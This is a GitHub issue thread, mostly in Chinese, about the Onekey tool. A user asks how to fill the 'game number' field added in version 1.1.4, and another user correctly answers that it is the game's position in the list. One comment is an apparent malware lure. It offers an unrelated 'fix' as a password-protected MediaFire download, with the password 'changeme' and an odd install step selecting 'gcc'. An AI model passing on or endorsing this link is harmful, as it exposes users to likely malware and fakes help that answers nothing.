### ISSUE TITLE
请问：请选择游戏编号，这个怎么填？

### ISSUE THREAD

**Issue by flyingtt29** [ikunshare/Onekey#11]
1.1.4版出现了请选择游戏编号这个必填项，请问这个编号到哪里找怎么填？
1.1.0版好像没有这个必填项，我加载了辐射四，也成功入库了

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by andycao133** [comment]
同问是为啥

**Comment by ZRen277353** [comment]
> 同问是为啥



> 1.1.4版出现了请选择游戏编号这个必填项，请问这个编号到哪里找怎么填？ 1.1.0版好像没有这个必填项，我加载了辐射四，也成功入库了

编号在游戏名开头顺序是从上到下，从1开始，如图红框内所示
![image](https://github.com/user-attachments/assets/dad79789-ec39-4896-aae8-8a3777f01a57)
